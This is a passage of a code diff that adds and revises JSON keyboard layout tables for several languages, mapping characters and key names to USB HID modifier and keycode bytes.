"HOME":"00,00,5f",
|
||||
"UP":"00,00,60",
|
||||
"PAGEUP":"00,00,61",
|
||||
".":"00,00,63",
|
||||
"0":"00,00,62",
|
||||
"1":"00,00,59",
|
||||
"2":"00,00,5a",
|
||||
"3":"00,00,5b",
|
||||
"4":"00,00,5c",
|
||||
"5":"00,00,5d",
|
||||
"6":"00,00,5e",
|
||||
"7":"00,00,5f",
|
||||
"8":"00,00,60",
|
||||
"9":"00,00,61"
|
||||
}
|
||||
|
||||
169
languages/cz.json
Normal file
169
languages/cz.json
Normal file
@@ -0,0 +1,169 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":" Czech QWERTZ version made by Andrej Šimko",
|
||||
"__comment":" Note that some special characters use leftCtrl+leftAlt+[key]",
|
||||
"__comment":" Special Czech characters like ěščřžýáíéů are not included",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"z":"00,00,1c",
|
||||
"y":"00,00,1d",
|
||||
"+":"00,00,1e",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"=":"00,00,2d",
|
||||
")":"00,00,30",
|
||||
";":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Z":"02,00,1c",
|
||||
"Y":"02,00,1d",
|
||||
"1":"02,00,1e",
|
||||
"2":"02,00,1f",
|
||||
"3":"02,00,20",
|
||||
"4":"02,00,21",
|
||||
"5":"02,00,22",
|
||||
"6":"02,00,23",
|
||||
"7":"02,00,24",
|
||||
"8":"02,00,25",
|
||||
"9":"02,00,26",
|
||||
"0":"02,00,27",
|
||||
"\\":"05,00,14",
|
||||
"%":"02,00,2d",
|
||||
"/":"02,00,2f",
|
||||
"(":"02,00,30",
|
||||
"'":"02,00,31",
|
||||
"\"":"02,00,33",
|
||||
"!":"02,00,34",
|
||||
"?":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
"|":"05,00,1a",
|
||||
"#":"05,00,1b",
|
||||
"&":"05,00,06",
|
||||
"@":"05,00,19",
|
||||
"$":"05,00,33",
|
||||
"*":"05,00,38",
|
||||
"{":"05,00,05",
|
||||
"}":"05,00,11",
|
||||
"[":"05,00,09",
|
||||
"]":"05,00,0a",
|
||||
"~":"05,00,1e",
|
||||
"^":"05,00,20",
|
||||
"<":"05,00,36",
|
||||
">":"05,00,37",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
}
|
||||
14
languages/de.json
Normal file → Executable file
14
languages/de.json
Normal file → Executable file
@@ -17,6 +17,7 @@
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"__comment":"German umlauts added by Simon Dankelmann",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
@@ -165,5 +166,14 @@
|
||||
"|":"40,00,64",
|
||||
"COMMAND-CTRL-SHIFT":"40,00,64",
|
||||
"COMMAND-CTRL":"40,00,64",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64"
|
||||
}
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64",
|
||||
"ß":"00,00,2d",
|
||||
"€":"40,00,08",
|
||||
"§":"02,00,20",
|
||||
"ä":"00,00,34",
|
||||
"ö":"00,00,33",
|
||||
"ü":"00,00,2f",
|
||||
"Ä":"02,00,34",
|
||||
"Ö":"02,00,33",
|
||||
"Ü":"02,00,2f"
|
||||
}
|
||||
|
||||
@@ -139,6 +139,7 @@
|
||||
")":"02,00,26",
|
||||
"=":"02,00,27",
|
||||
"?":"02,00,2d",
|
||||
"^":"02,00,30",
|
||||
"*":"02,00,31",
|
||||
";":"02,00,36",
|
||||
":":"02,00,37",
|
||||
@@ -164,4 +165,4 @@
|
||||
"COMMAND-CTRL-SHIFT":"40,00,64",
|
||||
"COMMAND-CTRL":"40,00,64",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64"
|
||||
}
|
||||
}
|
||||
|
||||
176
languages/es-la.json
Normal file
176
languages/es-la.json
Normal file
@@ -0,0 +1,176 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"0":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"'":"00,00,2d",
|
||||
"¿":"00,00,2e",
|
||||
"´":"00,00,2f",
|
||||
"+":"00,00,30",
|
||||
"ñ":"00,00,31",
|
||||
"{":"00,00,33",
|
||||
"}":"00,00,34",
|
||||
"|":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"<":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"&":"02,00,23",
|
||||
"/":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
"=":"02,00,27",
|
||||
"?":"02,00,2d",
|
||||
"¡":"02,00,2e",
|
||||
"¨":"02,00,2f",
|
||||
"*":"02,00,30",
|
||||
"Ñ":"02,00,31",
|
||||
"[":"02,00,33",
|
||||
"]":"02,00,34",
|
||||
"°":"02,00,35",
|
||||
";":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
">":"02,00,64",
|
||||
"\\":"04,00,2d",
|
||||
"~":"04,00,30",
|
||||
"^":"04,00,33",
|
||||
"`":"04,00,34",
|
||||
"¬":"04,00,35",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
}
|
||||
@@ -56,6 +56,7 @@
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"BACKSPACE":"00,00,2a",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
@@ -64,6 +65,7 @@
|
||||
"[":"00,00,2f",
|
||||
"]":"00,00,30",
|
||||
"#":"00,00,31",
|
||||
"__comment":"MIA K42 00,00,32",
|
||||
";":"00,00,33",
|
||||
"'":"00,00,34",
|
||||
"`":"00,00,35",
|
||||
@@ -102,10 +104,26 @@
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"NUMLOCK":"00,00,53",
|
||||
"KPAD_SLASH":"00,00,54",
|
||||
"KPAD_ASTERISK":"00,00,55",
|
||||
"KPAD_MINUS":"00,00,56",
|
||||
"KPAD_PLUS":"00,00,57",
|
||||
"KPAD_ENTER":"00,00,58",
|
||||
"KPAD_1":"00,00,59",
|
||||
"KPAD_2":"00,00,5a",
|
||||
"KPAD_3":"00,00,5b",
|
||||
"KPAD_4":"00,00,5c",
|
||||
"KPAD_5":"00,00,5d",
|
||||
"KPAD_6":"00,00,5e",
|
||||
"KPAD_7":"00,00,5f",
|
||||
"KPAD_8":"00,00,60",
|
||||
"KPAD_9":"00,00,61",
|
||||
"KPAD_0":"00,00,62",
|
||||
"KPAD_DOT":"00,00,63",
|
||||
"\\":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
@@ -137,6 +155,7 @@
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"£":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"^":"02,00,23",
|
||||
@@ -151,19 +170,26 @@
|
||||
"~":"02,00,31",
|
||||
":":"02,00,33",
|
||||
"@":"02,00,34",
|
||||
"¬":"02,00,35",
|
||||
"<":"02,00,36",
|
||||
">":"02,00,37",
|
||||
"?":"02,00,38",
|
||||
"|":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"ALT-TAB":"04,00,2b",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
"COMMAND":"08,00,00",
|
||||
"COMMAND-CTRL":"09,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"0b,00,00",
|
||||
"COMMAND-OPTION":"0c,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"0e,00,00",
|
||||
"ALTGR":"40,00,00",
|
||||
"ALTGR-TAB":"40,00,2b",
|
||||
"¦":"40,00,35",
|
||||
"CTRL-ALTGR":"41,00,00",
|
||||
"ALTGR-SHIFT":"42,00,00"
|
||||
}
|
||||
187
languages/hu.json
Normal file
187
languages/hu.json
Normal file
@@ -0,0 +1,187 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":" Hungarian QWERTZ language made by Skeleton022",
|
||||
"__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"z":"00,00,1c",
|
||||
"y":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"ö":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"ü":"00,00,2d",
|
||||
"ó":"00,00,2e",
|
||||
"ő":"00,00,2f",
|
||||
"ú":"00,00,30",
|
||||
"ű":"00,00,31",
|
||||
"é":"00,00,33",
|
||||
"á":"00,00,34",
|
||||
"0":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"í":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Z":"02,00,1c",
|
||||
"Y":"02,00,1d",
|
||||
"'":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"+":"02,00,20",
|
||||
"!":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"/":"02,00,23",
|
||||
"=":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
"Ö":"02,00,27",
|
||||
"Ü":"02,00,2d",
|
||||
"Ó":"02,00,2e",
|
||||
"Ő":"02,00,2f",
|
||||
"Ú":"02,00,30",
|
||||
"Ű":"02,00,31",
|
||||
"É":"02,00,33",
|
||||
"Á":"02,00,34",
|
||||
"?":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
"Í":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00",
|
||||
"{":"40,00,05",
|
||||
"&":"40,00,06",
|
||||
"[":"40,00,09",
|
||||
"]":"40,00,0a",
|
||||
"}":"40,00,11",
|
||||
"\\":"40,00,14",
|
||||
"@":"40,00,19",
|
||||
"|":"40,00,1a",
|
||||
"#":"40,00,1b",
|
||||
">":"40,00,1d",
|
||||
"~":"40,00,1e",
|
||||
"^":"40,00,20",
|
||||
"`":"40,00,24",
|
||||
"$":"40,00,33",
|
||||
";":"40,00,36",
|
||||
"*":"40,00,38",
|
||||
"<":"40,00,64"
|
||||
}
|
||||
172
languages/jp.json
Normal file
172
languages/jp.json
Normal file
@@ -0,0 +1,172 @@
|
||||
{
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,0c",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"\"": "02,00,1f",
|
||||
"3": "00,00,20",
|
||||
"#": "02,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "02,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"&": "02,00,23",
|
||||
"7": "00,00,24",
|
||||
"'": "02,00,24",
|
||||
"8": "00,00,25",
|
||||
"(": "02,00,25",
|
||||
"9": "00,00,26",
|
||||
")": "02,00,26",
|
||||
"0": "00,00,27",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
